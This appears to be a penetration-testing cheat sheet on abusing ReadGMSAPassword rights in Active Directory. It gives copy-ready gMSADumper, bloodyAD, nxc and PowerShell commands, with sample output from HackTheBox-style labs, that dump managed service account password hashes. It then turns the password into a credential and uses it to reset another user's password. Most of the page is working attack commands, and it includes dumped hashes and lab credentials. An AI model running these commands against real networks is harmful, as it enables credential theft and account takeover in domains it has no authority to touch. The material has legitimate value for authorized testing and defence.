Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Read GMSAPassword (From Linux)
1. Set Allowed to Retrieve the Password for this MSA [Optional]
Set-ADServiceAccount -Identity "<TARGET_IDENTITY>" -PrincipalsAllowedToRetrieveManagedPassword "<USER>"
Sample Output:
TO-DO2. Read GMSA Password
# Password
python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -l <DC> -d <DOMAIN>
Sample Output:
$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3
# NTLM
python3 gMSADumper.py -u '<USER>' -p '<LM_HASH>:<NT_HASH>' -l <DC> -d <DOMAIN>
Sample Output:
TO-DO# Kerberos
python3 gMSADumper.py -k -l <DC> -d <DOMAIN>
Sample Output:
TO-DORef: gMSADumper
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
$ bloodyAD -d intelligence.htb -u ted.graves -p 'Mr.Teddy' --host intelligence.htb get object 'svc_int$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
TO-DO# Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k ccache='<USER>.ccache' --host <DC> get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
TO-DORef: bloodyAD
# Password
nxc ldap -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> <DC> --gmsa
Sample Output:
$ nxc ldap -u ted.graves -p 'Mr.Teddy' -d intelligence.htb dc01.intelligence.htb --gmsa
SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.10.248 636 DC [+] intelligence.htb\ted.graves:Mr.Teddy
LDAPS 10.10.10.248 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.10.248 636 DC Account: svc_int$ NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4
# NTLM
nxc ldap -u '<USER>' -H '<HASH>' -d <DOMAIN> <DC> --gmsa
Sample Output:
TO-DO# Kerberos
nxc ldap -u '<USER>' -k --use-kcache -d <DOMAIN> <DC> --gmsa
Sample Output:
TO-DOAbuse #2: Save as Cred
$gmsa = Get-ADServiceAccount -Identity '<TARGET_IDENTITY>' -Properties 'msDS-ManagedPassword'
Sample Output:
PS C:\programdata> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
Sample Output:
PS C:\programdata> $mp = $gmsa.'msDS-ManagedPassword
PS C:\programdata> ConvertFrom-ADManagedPasswordBlob $mp
Version : 1
CurrentPassword : ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾ롤
ᒛ�䬁ማ譿녓鏶骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword : System.Security.SecureString
PreviousPassword :
SecurePreviousPassword :
QueryPasswordInterval : 2019.19:45:41.4967000
UnchangedPasswordInterval : 2019.19:40:41.4967000
$password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
Sample Output:
PS C:\programdata> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
Sample Output:
PS C:\programdata> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential '<TARGET_NAME>', $SecPass
Sample Output:
PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA', $SecPass
# For example, change password of another target user
Invoke-Command -ComputerName <COMPUTER_NAME> -ScriptBlock {Set-ADAccountPassword -Identity '<ANOTHER_TARGET_NAME>' -reset -NewPassword (ConvertTo-SecureString -AsPlainText '<NEW_PASSWORD>' -force)} -Credential $cred
Sample Output:
PS C:\programdata> Invoke-Command -ComputerName . -ScriptBlock {Set-ADAccountPassword -Identity 'tristan.davies' -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'Test1234' -force)} -Credential $cred